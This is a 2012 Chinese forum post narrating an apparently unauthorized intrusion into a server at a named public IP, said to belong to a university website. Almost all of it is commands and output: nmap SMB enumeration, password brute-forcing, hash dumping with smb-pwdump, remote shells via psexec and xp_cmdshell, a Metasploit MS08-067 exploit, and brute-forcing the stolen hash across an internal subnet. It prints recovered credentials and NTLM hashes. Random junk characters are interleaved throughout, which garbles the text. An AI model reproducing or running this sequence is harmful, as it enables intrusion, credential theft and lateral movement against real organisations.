广西师范网站http://202.103.242.241/3 y3 _# x2 [( u$ O8 Y: \% c2 m+ p7 ~
' b2 U2 `7 O4 J: |) O0 G8 y! k8 \root@bt:~# nmap -sS -sV 202.103.242.241- [% T5 n& q j! j8 s' s, k
6 U+ o3 F N& J3 o0 ]& \Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 21:54 CST7 r% U5 j2 D' }5 p
, ~) R1 B' g0 [% g- d6 Q
Nmap scan report for bogon (202.103.242.241)2 U! t7 R! S' \/ b% v3 {; A
+ m" m( z2 s5 jHost is up (0.00048s latency).
3 N, J7 ? ]* ]3 c0 {% v: F0 O7 I, y. O T" v+ @
Not shown: 993 closed ports
+ [8 K* |$ C- z4 n
; T1 |7 _+ _5 k% w) n5 sPORT STATE SERVICE VERSION' j& p+ R3 o5 p9 `
9 {$ m) h8 i U3 L9 Q
135/tcp open mstask Microsoft mstask (task server – c:\winnt\system32\Mstask.exe)
: L% U% u; O: k- g$ _, `2 i; c, Y* p$ A# Z3 `4 Y: a
139/tcp open netbios-ssn
E& [2 q ~5 C O* s% a& E* w" x+ Q! P* u a2 _" |6 I" S5 b
445/tcp open microsoft-ds Microsoft Windows 2000 microsoft-ds2 s& [7 n @" d6 O- }. O$ w
' E: O# _9 V1 g2 \2 H0 t
1025/tcp open mstask Microsoft mstask (task server – c:\winnt\system32\Mstask.exe)/ _9 u# i8 \( L# u7 x- X7 j
2 i$ ?& O9 H5 C1026/tcp open msrpc Microsoft Windows RPC9 w8 Z) P; ^+ G# b$ O
8 j) a5 D2 y; l) U
3372/tcp open msdtc?6 C j- ]- S4 K5 H' X1 Q* g
) _; }7 @3 H) @0 K; T7 z& L3 q/ |* C
3389/tcp open ms-term-serv?
4 h8 o. B5 \7 z" `4 i: ^& G/ {; P) @) u* L! A, q2 A+ S2 m
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
. y5 J. _/ F3 ~( h/ mSF-Port3372-TCP:V=5.59BETA1%I=7%D=2/28%Time=4F4CDC90%P=i686-pc-linux-gnu%r
: v9 d+ k2 ?! N j' ~1 {5 Z3 I1 x2 a8 V
SF GetRequest,6,”hO\n\x000Z”)%r(RTSPRequest,6,”hO\n\x000Z”)%r(HTTPOptions& ~2 H5 V. c: ]% J8 \* B6 ~
2 P' |0 [: n h% j! N& PSF:,6,”hO\n\x000Z”)%r(Help,6,”hO\n\x000Z”)%r(SSLSessionReq,6,”hO\n\x000Z”)
( q6 F8 {- d; @% d
1 @1 L& d8 X8 l* B9 |3 R6 TSF:%r(FourOhFourRequest,6,”hO\n\x000Z”)%r(LPDString,6,”hO\n\x000Z”)%r(SIPO
3 z$ H4 K6 V4 D$ r; { ^7 T: @6 N0 n
SF:ptions,6,”hO\n\x000Z”);* j7 F% J0 F8 [
/ I9 t0 ~4 s( v4 t; PMAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems); W1 x0 w* y/ N0 a$ I3 O; u6 s
: T6 a6 M: @3 F* n1 d/ JService Info: OS: Windows0 e# Y- P5 F# s% ]& m
: N3 b4 i8 e4 ^* n5 TService detection performed. Please report any incorrect results at http://nmap.org/submit/ .
, R- ?- O& Y% H8 ^7 i. @7 E1 h
* y+ ?3 w- X2 ~" fNmap done: 1 IP address (1 host up) scanned in 79.12 seconds$ c' k8 t' m7 a6 @
9 X' e4 e8 W. ]6 O0 [ `! hroot@bt:/usr/local/share/nmap/scripts# ls -la | grep smb //列出扫描脚本* o( D4 F' C8 D$ {. E8 z5 _2 @- i
0 n9 r! y5 Z" Y! y-rw-r–r– 1 root root 44055 2011-07-09 07:36 smb-brute.nse
- M) L( B; b6 F; _3 I& e( O. B" }) y+ g4 ]5 l$ @
-rw-r–r– 1 root root 27691 2011-07-09 07:36 smb-check-vulns.nse& X* L/ E7 U. z3 k1 ~0 @
' O: M: J& v7 x-rw-r–r– 1 root root 4806 2011-07-09 07:36 smb-enum-domains.nse0 I( k; G% F1 C( v# w9 V# b& [( o x
6 H5 X8 [& d( ?) {( p-rw-r–r– 1 root root 3475 2011-07-09 07:36 smb-enum-groups.nse6 d4 l7 p, j0 j" y# t7 A
$ R9 E- d. u! A. T-rw-r–r– 1 root root 7958 2011-07-09 07:36 smb-enum-processes.nse/ o9 S; ^0 b J& x/ K. J$ I
( e; t) o x& \; o7 j8 P6 r2 ]-rw-r–r– 1 root root 12221 2011-07-09 07:36 smb-enum-sessions.nse
/ |; m5 c9 `+ k" L3 M# k6 V+ M
! a8 p2 o9 _+ q0 F5 k$ C$ S-rw-r–r– 1 root root 6014 2011-07-09 07:36 smb-enum-shares.nse
) x, J q3 I, W7 P. ]+ l- b9 _) S4 w& t+ y7 |
-rw-r–r– 1 root root 12216 2011-07-09 07:36 smb-enum-users.nse
$ n1 O) Q1 G+ M$ R4 l* z8 m
, a# @3 H6 l4 _9 y# S-rw-r–r– 1 root root 1658 2011-07-09 07:36 smb-flood.nse+ v$ C0 b' S. x, d: j3 a
3 | H; X7 [' \( `-rw-r–r– 1 root root 2906 2011-07-09 07:36 smb-os-discovery.nse5 g- x: A+ {; P( m3 ?
- }6 `9 a& l4 S4 Z ?, n-rw-r–r– 1 root root 61005 2011-07-09 07:36 smb-psexec.nse1 e3 B& Z+ v9 L. n9 G& c4 ~- z+ {
7 [( j3 w! c+ g8 V8 j4 D
-rw-r–r– 1 root root 4362 2011-07-09 07:36 smb-security-mode.nse: E% `! H) }# v E3 W6 j N1 Z5 v
2 m' i& N2 s/ E" P2 ~
-rw-r–r– 1 root root 2311 2011-07-09 07:36 smb-server-stats.nse* m/ g' a! _* c/ ]
& j$ [' \1 h5 F' s+ e1 G( c-rw-r–r– 1 root root 13719 2011-07-09 07:36 smb-system-info.nse, J, @- T& C4 Q3 e
# }% D3 r4 _$ Z& ~-rw-r–r– 1 root root 1429 2011-07-09 07:36 smbv2-enabled.nse
5 X b! |$ W0 u( @7 n& W2 }/ y& `: L* ]) A1 j
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-enum-users.nse 202.103.242.241
, \- W9 t: I' X5 b$ y; L/ H( E N- I" `' A1 I& q g
//此乃使用脚本扫描远程机器所存在的账户名4 M, E u6 u; V& O9 L S
$ d i% n0 ^* _ [$ FStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:12 CST1 x$ Z% ]) Q' x/ U
# ?' p# l! h2 S' B8 r! T
Nmap scan report for bogon (202.103.242.241); L) O# W7 i0 }( G( M4 R
8 Y! Z2 @1 H0 w* |9 C w$ ~Host is up (0.00038s latency).
1 z- V& k" _; T, e8 g- N' I4 f; l# T( ^9 E b6 M
Not shown: 993 closed ports
# \$ I) E( M$ `& Y# g3 W3 B/ U3 G3 c7 J0 U% y
PORT STATE SERVICE9 x& ^( P2 r) }5 S& ^
& z: ^% a: G" U/ Z135/tcp open msrpc* s$ P* q8 ~! @3 K$ W* Z3 U" z) [
9 g4 r- _2 c1 C% r; y% y139/tcp open netbios-ssn& W0 ]. Q2 J! d" F
/ j4 A: }/ [9 B: c445/tcp open microsoft-ds
8 f9 ]3 N6 j8 f8 x
! D) A% W0 i" C0 }/ f! r1025/tcp open NFS-or-IIS
3 ]; w; R0 ?. h" I, H* |4 C* U Q8 C& h: n6 u
1026/tcp open LSA-or-nterm* y- C, U5 ^( C' y; w
. W; @; f$ k2 j
3372/tcp open msdtc
4 W5 J! v ~! H
4 T/ B7 N3 e; D/ d. E( T3389/tcp open ms-term-serv
4 w/ S6 Q8 {6 o z7 v! |' [
2 [4 C3 L1 d" X; L, F# qMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)( O9 V! c7 j# }$ M" v4 ~
! |, F$ t; ?9 z8 T9 E3 \( A
Host script results:1 Y/ O. F' x7 [9 B% {
% ^% Q/ {' B. }$ P. R# s c! S| smb-enum-users:
9 H; @+ M+ U i
h7 M, w# i9 ~* ~2 J' B9 L7 @|_ Domain: PG-F289F9A8EF3E; Users:Administrator, Guest, test, TsInternetUser //扫描结果
3 O3 ?* H9 d# S9 a) o6 W( K; e$ F, h& F" |# m' f/ o3 r
Nmap done: 1 IP address (1 host up) scanned in 1.09 seconds
6 F! h, W) b: x& V8 W6 P) `
) B2 v6 D0 ^$ mroot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-enum-shares.nse 202.103.242.241
& h' K6 D& r L, `- U" ~' B/ M6 J8 O! Z" b0 W- g' O {( U
//查看共享
: z+ F6 N. u9 U. ^; M O5 D. Q) D9 r' I2 z; u- Q. U
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:15 CST0 ]+ b! ^0 }5 m9 Z/ `/ s d) H
# c. ~- @* C/ N* Q
Nmap scan report for bogon (202.103.242.241)
! F( d! h; ?) u3 e5 N* z& G- Y8 Y9 @) R+ V7 O9 L% r
Host is up (0.00035s latency).
$ O; C4 l1 U- w
- b' K/ \: R- W. @Not shown: 993 closed ports
5 V5 z( o$ R1 z+ e
' Y* t7 m2 ^1 k" v& D; lPORT STATE SERVICE3 p; q0 y6 D* o8 U; ?6 e2 E
[5 t* `, N5 n7 M5 z$ [% ^9 p' Q135/tcp open msrpc+ N7 R6 ]* y' O/ a" `: F' U, \
7 i" L' P5 ?: a$ \- T- f139/tcp open netbios-ssn4 I- z, \% f" b$ s. N6 T% }# g
- e3 J) `! ]7 a8 [7 _
445/tcp open microsoft-ds- p9 w6 E' U& e6 V
! D# ~+ [7 I8 a- V1025/tcp open NFS-or-IIS- [$ u$ E9 V0 G
- M0 I4 \9 z' E/ a! n" L
1026/tcp open LSA-or-nterm
8 q, `+ m6 F7 n- f: b% P9 @5 _: d* ~8 Y+ r9 i+ x1 m+ W9 C5 c
3372/tcp open msdtc3 r- w* p# i w' a
. p6 q8 }" T: _
3389/tcp open ms-term-serv5 W" _* ` y- Z! m1 ^ w5 z3 _: t
+ k* h) {4 A) O) f' |- v" f
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)/ L9 Q9 n* m- S2 n( }
! z0 z- l9 K- t' M$ W% ^Host script results:' i1 a* a* a( `5 V6 m
, T* E3 a1 u* C! V. [# G| smb-enum-shares: z, A1 ~, w1 A' M, R
( W2 M3 g/ @' h% w1 t @
| ADMIN$
9 w' }. n; ]9 g9 x: B6 g$ X6 s2 A! K' q3 F% ? e4 A
| Anonymous access: <none>
1 p0 E S: E; w# e4 e% n. n8 `
) u6 z' y2 d! A/ h' z| C$
, i/ {0 j" ~7 x6 w0 F8 d% |' {/ j% p1 U9 h J" g8 e+ B
| Anonymous access: <none>2 Y- ` a8 _' q& [8 y' t9 }
9 D( F/ p- Y* P: Y" r! h4 W+ ]| IPC$5 O/ }( V! e" I# N6 y
+ M3 i% _( t n4 J$ G& T* [$ P
|_ Anonymous access: READ
; J4 T$ F" c) h, H0 q4 t8 W. P& Q: [' L* `) v( o. G
Nmap done: 1 IP address (1 host up) scanned in 1.05 seconds2 E/ e" K D* A, ?
+ X) l A1 w: b8 w5 a9 jroot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-brute.nse 202.103.242.241 : a# t' s7 b4 a9 A' C7 f
/ x6 [9 }; z( m# X! ?! t//获取用户密码
( K# |1 Y1 p$ L8 s( S
8 F; e2 e1 \% L$ Q; p% r7 O+ T" hStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:17 CST
# _8 j$ j6 i$ J# {9 g; ?; t1 r8 E
0 j5 b4 T, ^5 e k& \1 j% ?. xNmap scan report for bogon (202.103.242.2418)
& n- p1 h2 `9 z% ] N/ @) @& t! O# W
Host is up (0.00041s latency).
# J! {( Q, b v( n6 z; \
( [0 A! b3 g) b) ^7 ]Not shown: 993 closed ports: v! H+ F+ a3 r" L
# W9 p. V3 S' v* K9 W! Q" ~PORT STATE SERVICE
E0 b& C; i: q2 t
+ u1 r* L) o. A- N135/tcp open msrpc
/ V# a* Z4 H- i% l2 { I, I3 C
4 M4 X0 T7 U- ^6 N" ^6 [$ w139/tcp open netbios-ssn/ z* \0 i' u3 V2 g& ^
`+ `) O# t6 Q1 ?
445/tcp open microsoft-ds* G+ U: \* C% z* v% i
- |2 U* }2 V5 j* ]8 ^
1025/tcp open NFS-or-IIS5 F5 y. i5 M& i; j
; F( {+ s4 C9 C U1 p1 _1 ~, k1 Q) k
1026/tcp open LSA-or-nterm
. m9 u# d* E9 Q7 u' |- `
4 B) D" P( c* O' B) h+ P3372/tcp open msdtc% f; }$ C1 H9 w. f. q- M
2 E, a6 `. Q% K* R7 W, t- p/ P3389/tcp open ms-term-serv
- h6 q1 w3 V- @( x: b+ Y Q3 @# T
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)% [! y5 a2 ?9 |5 A
3 i: C$ Q4 k- |2 k" C
Host script results:
# c$ P1 O( Y U S% \% n! M- g5 d8 J9 F/ k6 H" Q8 a0 B
| smb-brute:
0 h0 n& }4 }- n3 n4 M) j$ K7 @% Q* a7 X2 N* F8 K) f6 k% S
administrator:<blank> => Login was successful
& T4 c5 T5 @, n: w0 E1 i7 z
6 W" A8 z; u3 V|_ test:123456 => Login was successful! K- o$ ~, }2 u3 J3 v! w
: @0 n; X2 A0 i. g+ n9 m/ PNmap done: 1 IP address (1 host up) scanned in 28.22 seconds5 u+ w7 i* m1 {9 i [
6 e3 ?# I: X4 O- _3 O F. D& `
root@bt:~# wget http://swamp.foofus.net/fizzgig/ ... -exe-only.tar.bz2//抓hash6 Z+ l! k# Z( x. a
* D9 J7 }2 B: Iroot@bt:~# tar -jxvf pwdump6-1.7.2-exe-only.tar.bz2 -C /usr/local/share/nmap/nselib/data% d. w _8 ^# V8 N
1 _" U$ A& W7 e
root@bt:/usr/local/share/nmap/scripts# wget https://svn.nmap.org/nmap-exp/dev/nmap/scripts/smb-pwdump.nse$ D1 I6 {, j, V+ p1 n
/ t9 \( L: P/ B( H- O1 Kroot@bt:~# nmap –script=smb-pwdump.nse –script-args=smbuser=test,smbpass=123456 202.103.242.241 -p 135,445,1394 r, L. {- S7 \0 z: a
% O" R+ c" T+ `+ g
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:25 CST( b- {0 k/ W% s" i. P8 {
: \1 H$ \8 [/ v- ^$ qNmap scan report for bogon (202.103.242.241)
! m; \" {" N+ L; ^" b. I) g1 L
Host is up (0.0012s latency).
7 c; c+ x- O3 {: [% {$ A) ?
! ~3 e# W6 U& k: n2 \PORT STATE SERVICE
% ]0 B& l; ]0 R& M0 P4 U" b+ e' j# X4 d0 }
135/tcp open msrpc
/ j! d' }' r% u" I, x% `9 w& f- q9 m) ]1 p: D- ^4 ^" Y( H4 H* ~( h
139/tcp open netbios-ssn
+ g: I# _+ d! N# u8 f9 y* k, N! a: x/ J& q
445/tcp open microsoft-ds
( D# u+ X- U% d/ c U
! m2 L) N( e5 G2 X1 k- G0 [ iMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
6 k/ x) c, D, ~1 j) @
$ R7 U& x% U9 s+ QHost script results:
( Z( ?$ c Q# ?. T
) ?) W2 \7 W% d' g+ z, {, @1 ]5 _| smb-pwdump:7 G# G$ g/ W w# [4 n
4 H+ ?5 {7 G# o! D# P| Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************5 b" o/ G& |9 m$ C( p2 @, @( z4 c: u
' G1 ?* N+ j4 T
| Guest:501 => NO PASSWORD*********************:NO PASSWORD*********************
' H5 n4 `2 [" T# `# A" M( f9 M! L* o- w
| test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4" g8 X6 r0 U: s8 X* J$ h2 P1 k4 k
/ g6 ^7 P! o& P8 }/ I$ G& s) V|_TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D2
# q& T0 J& |0 p, N) w( t' P+ c7 {7 r) G" S
Nmap done: 1 IP address (1 host up) scanned in 1.85 seconds3 z# ]& Q2 Y4 y
! N5 \7 s l) ^5 F& X2 A0 `
C:\Documents and Settings\Administrator\桌面>psexec.exe \\202.103.242.241 -u test //获取一个cmdshell
: ] V" j, o& P3 T+ E& N( d' S2 ~9 o2 r. o
-p 123456 -e cmd.exe; l& j1 J# j: [& I# z$ U9 l0 v& [& S
% d* S! W: ?% s$ b0 k2 hPsExec v1.55 – Execute processes remotely+ }( r. |" k; z4 \
% x( b% r7 k2 [$ z' u i5 ?
Copyright (C) 2001-2004 Mark Russinovich r, N# b# h# P1 @ A
0 N( d4 @& P- j" W+ i" V4 o8 fSysinternals – www.sysinternals.com/ |0 P" c, l- _1 o8 G* A
7 O0 ^0 s) f/ m
Microsoft Windows 2000 [Version 5.00.2195]
) v7 ~ y9 A2 t$ x5 Y3 ^' L( l# o `) y$ f& K) W
(C) 版权所有 1985-2000 Microsoft Corp.7 c4 ^' `. a$ ]9 ?1 ?" L
& w/ o! [% U) o, A+ V! _
C:\WINNT\system32>ipconfig
1 F# _" E+ A9 K- F$ E3 }
+ r2 v( D7 O) J& {" E" ^Windows 2000 IP Configuration
; ` G9 j6 _) R
~% v7 O) f' AEthernet adapter 本地连接:( K: W9 H( r- S
; L6 N, u5 g. m; D, U
Connection-specific DNS Suffix . :
5 L( I3 H' l* Y+ } }' k. f! F& d
! f5 k7 I8 _! x4 v ?IP Address. . . . . . . . . . . . : 202.103.242.241; h) U) v7 o$ P
# Q. l. F5 z0 h. l2 ESubnet Mask . . . . . . . . . . . : 255.255.255.0/ k! b4 ~" V( R7 r
7 X6 z0 q; U0 e$ ^+ M; K% W9 r) S$ b& k; I
Default Gateway . . . . . . . . . : 202.103.1.1- B8 E6 T1 B Z. t
0 n% G6 ] D' |( [+ H
C:\Documents and Settings\Administrator\桌面\osql>osql.exe -S 202.103.242.241 -U sa -P “123456″ -Q “exec master..xp_cmdshell 'net user' “ //远程登录sa执行命令% j: i( Q ^8 h
( q5 b5 a) p5 T1 h" croot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-check-vulns.nse 202.103.242.241 //检测目标机器漏洞& f6 F5 x9 U# Y3 t
5 F( s$ s5 f3 Q2 f6 bStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:41 CST
- `' P' }$ n& I( f' a V: e9 X G1 J# H+ e) B
Nmap scan report for bogon (202.103.242.241)
# ]6 M; ]7 ?5 U: s; U* [+ ^% e m, i2 c
Host is up (0.00046s latency).
' P) w& K2 x6 E$ T8 ^. X
8 k5 R7 b% }& e% O% V8 ]! v9 E* Z1 E8 G) yNot shown: 993 closed ports, m% K1 v. g. H" k
, P4 ^ s! _% ^( d" J3 DPORT STATE SERVICE9 J5 B1 w! o- ~$ y/ y- e- j
) t' b6 M3 j7 i+ G% t
135/tcp open msrpc
' Q/ i/ m+ m4 s. f) ~
: x& T2 ?2 w3 J+ j, t2 C139/tcp open netbios-ssn
% s. ]5 l: e; r
$ O9 R, G4 N0 Z- U( M445/tcp open microsoft-ds
% K1 T" R5 ]7 _$ [$ ? g2 N* ^6 a! m
1025/tcp open NFS-or-IIS. g5 S% X$ h5 D. I7 D- Q# M# |
- n% M1 H1 L: j/ m1026/tcp open LSA-or-nterm+ y, g4 y1 k) C! k {: l
* F- X( I7 @. H% `9 ?3372/tcp open msdtc
' c( g3 Z2 L4 ^0 ^5 X& J* C* k: C4 M4 Z* L
3389/tcp open ms-term-serv
+ ?( m, [* r# F! T# w, k0 ]' H. }
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
* v: i' L* j1 @ _* |5 n$ x
/ G, v/ q$ {! Q! MHost script results: l, b% f3 h8 V# m& @ I
' b/ L! ^9 b0 B
| smb-check-vulns:6 A. f# y9 N$ Y
: {: I/ q( g0 g9 T
|_ MS08-067: VULNERABLE5 O& {$ s1 m+ Y0 B1 z
0 ]$ q2 k3 V7 E- f9 `' \( \) H$ K1 j: w fNmap done: 1 IP address (1 host up) scanned in 1.43 seconds( o- x& n) N6 @2 K, e: b+ S
, t4 z8 c. j2 Y: [: n5 froot@bt:~# msfconsole //在msf上利用ms08-067漏洞对目标机器进行溢出
7 j- X( |* k- @- s1 l
, Q8 d6 O! |# I0 nmsf > search ms08
% ]+ W$ D2 P9 q. c7 e- o# h$ z, E5 g# }+ {
msf > use exploit/windows/smb/ms08_067_netapi0 R* S" k; L3 V
# A, |: h. R% u3 @- Tmsf exploit(ms08_067_netapi) > show options
5 H% t& V& V4 F4 w. O3 l, a9 J
msf exploit(ms08_067_netapi) > set RHOST 202.103.242.241
" f! T' @& T9 {, E8 p' c {" n: I9 U; ^, B3 |' g5 n" |
msf exploit(ms08_067_netapi) > show payloads
6 A" L8 a e! ^; S4 u9 v! \6 n. Q4 E' |* K5 _0 e2 { E
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
* y3 i- V3 X ^6 q5 Q' l% E, V& C7 ?
1 N% z7 y: g" V0 ?0 S$ c. }6 z: ~msf exploit(ms08_067_netapi) > exploit# B0 m( [ i0 s$ H4 ~; {
) \+ j U; [) h$ j% o" xmeterpreter >3 q0 h& g7 ?3 j6 p- w# g8 F
0 ~6 d! ~2 ~$ i: ?
Background session 2? [y/N] (ctrl+z)
$ ~! J2 W0 P; R) w& ~- W' ?/ D3 A! A8 f( W% p' s1 Y2 x0 Y# F
msf exploit(ms08_067_netapi) > sessions -l' j4 r2 r. g3 S% Y$ y
, O4 X! G( x$ ^* @; Croot@bt:/usr/local/share/nmap/scripts# vim usernames.txt g5 N* w$ J Y5 i0 q/ p
6 J4 A- b7 C3 t" r
test/ W, S3 _* Y! l1 G, T4 }
: p) i$ }# Z. f* @
administrator
6 ^! ]6 f' K! e& }! \$ h
5 s! @/ O( F H8 x7 w( y' wroot@bt:/usr/local/share/nmap/scripts# vim password.txt
5 {, {1 W Z; `, d1 }1 X; x; v5 \, |. M8 f4 O
44EFCE164AB921CAAAD3B435B51404EE
) M' \' D: Q9 J* s$ V1 ]* F8 i8 p- c/ [9 s) p! p4 a
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-brute.nse –script-args=userdb=usernames.txt,passdb=password.txt 192.168.1.1-254 ! u$ p! }8 ?: r, ]# g9 d: ^7 G9 H7 W5 I
- K4 Z Q/ B4 u5 o
//利用用户名跟获取的hash尝试对整段内网进行登录
! V. ?& \- W$ O' g1 o$ h h6 y* B y8 w# Z4 c
Nmap scan report for 192.168.1.105% q' `- ^; F* s5 ?" J
' S, ?$ S1 u* _1 S$ N
Host is up (0.00088s latency).
- g( u6 g1 G$ n/ o% h1 |4 U: W$ i
& l$ }3 s( ?; k& [* O3 YNot shown: 993 closed ports
7 T! u5 j' w, j1 e0 [" t% k( Z$ T4 X+ V* I
PORT STATE SERVICE
0 F9 Y3 V/ a3 M, j9 M* e) ?) G) F, t1 L g( Z3 Y
135/tcp open msrpc
7 M$ k/ r& v L$ [) \
$ z: m+ Y7 X" S8 \% n6 ]7 R139/tcp open netbios-ssn8 Q- u9 Y+ v3 L5 ?6 R4 }$ v
3 X# N7 g: j4 }. V T9 l9 Z
445/tcp open microsoft-ds
- _ s* Y+ F \' P* H* M* Y# X. t# A, p- w O: M; ]. k3 k: g
1025/tcp open NFS-or-IIS- C9 E8 ~6 ~9 V% E6 r/ W% A3 h
3 r& ?# o( W K e+ N
1026/tcp open LSA-or-nterm
6 E4 l- \' s4 i7 ^5 U) h3 s1 D/ k6 H
3372/tcp open msdtc: T; [ o5 o& N& ]$ f
3 _' k+ X: Q" t
3389/tcp open ms-term-serv, g7 w! D2 ~) S; m
* e4 H1 |& Q p& E m4 P$ p
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)5 R. v6 ^; N& G% J' `& g2 p$ {% D
W& l- \: N! c5 s% O6 S3 ~; C
Host script results:
2 O# i$ Y' Z4 ~0 T3 G# i6 A# P! |4 V, u
| smb-brute:
# \" |% T( G# g2 _' U, `1 W8 _0 q! P( {' g* J3 M3 |
|_ administrator:<blank> => Login was successful9 Z2 s4 C. ], H( N5 X! F
1 M. f6 M2 t O" J9 T# B4 s
攻击成功,一个简单的msf+nmap攻击~~·
! r/ W1 Q! n/ {! W6 k
4 ?) N8 D0 f9 n# h8 u+ ^ |
发表于 2012-12-4 12:46:42
收藏
支持
反对